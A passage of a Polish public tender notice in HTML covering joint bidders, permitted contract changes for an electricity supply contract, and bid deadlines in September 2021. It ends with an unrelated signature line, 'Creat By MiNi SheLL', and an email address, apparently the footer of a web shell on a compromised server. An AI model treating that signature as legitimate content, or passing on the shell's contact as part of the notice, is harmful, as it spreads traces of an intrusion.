pełnomocnika.<br/>4. Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie<br/>zamówienia i mają do nich zastosowanie zasady określone w pkt 1 – 3.<br/>5. Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia będą mieli obowiązek przedstawić zamawiającemu kopię umowy<br/>regulującej współpracę tych wykonawców, zawierającą, co najmniej:<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim<br/>zakresem realizację przedmiotu zamówienia,<br/>2) określenie zakresu działania poszczególnych stron umowy,<br/>3) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej<br/>jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich<br/>wprowadzenia:<br/>1) w przypadku zmiany następujących aktów prawnych:<br/>a) ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne;<br/>b) ustawy z dnia 6 grudnia 2008 r. o podatku akcyzowym w zakresie akcyzy na energię elektryczną;<br/>c) rozporządzenia Ministra Gospodarki z dnia 14 września 2008 r. w sprawie szczegółowego<br/>zakresu obowiązków uzyskania i przedstawienia do umorzenia świadectw pochodzenia,<br/>uiszczania opłaty zastępczej, zakupu energii elektrycznej ciepła wytworzonych w odnawialnych<br/>źródłach energii oraz obowiązku potwierdzenia danych dotyczących ilości energii elektrycznej<br/>wytworzonej w odnawialnym źródle energii;<br/>d) rozporządzenia Ministra Gospodarki z dnia 26 września 2007 r. w sprawie sposobu obliczania<br/>danych podanych we wniosku o wydanie świadectwa pochodzenia Kogeneracji oraz<br/>szczegółowego zakresu obowiązku uzyskania i przedstawiania do umorzenia tych świadectw,<br/>uiszczania opłaty zastępczej i obowiązku potwierdzania danych dotyczących ilości energii<br/>elektrycznej wytworzonej w wysokosprawnej kogeneracji;<br/>e) ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług;<br/>f) zmiany ilości punktów poboru energii wskazanych w załączniku nr 5 do SWZ, przy czym<br/>zmiana ilości punktów poboru energii elektrycznej wynikać może np. z likwidacji punktu poboru z<br/>eksploatacji w okresie trwania umowy, podłączenia punktu poboru, wyłączenia do eksploatacji<br/>lub zmiany stanu prawnego punktu poboru (w tym przejęcia), zmiany w zakresie odbiorcy,<br/>zaistnienia przeszkód prawnych i formalnych uniemożliwiających przeprowadzenie procedury<br/>zmiany sprzedawcy, w tym w przypadku zaistnienia przeszkód uniemożliwiających rozwiązanie<br/>dotychczas obowiązujących umów;<br/>g) ceny jednostkowe składników cenowych za świadczone usługi dystrybucji mogą ulec zmianie<br/>w przypadku zmiany „Taryfy dla usług dystrybucji energii elektrycznej” zatwierdzonej przez<br/>Prezesa Urzędu Regulacji Energetyki. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/miroslawiec/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie wymaga złożenia dokumentów, o których mowa w § 4<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com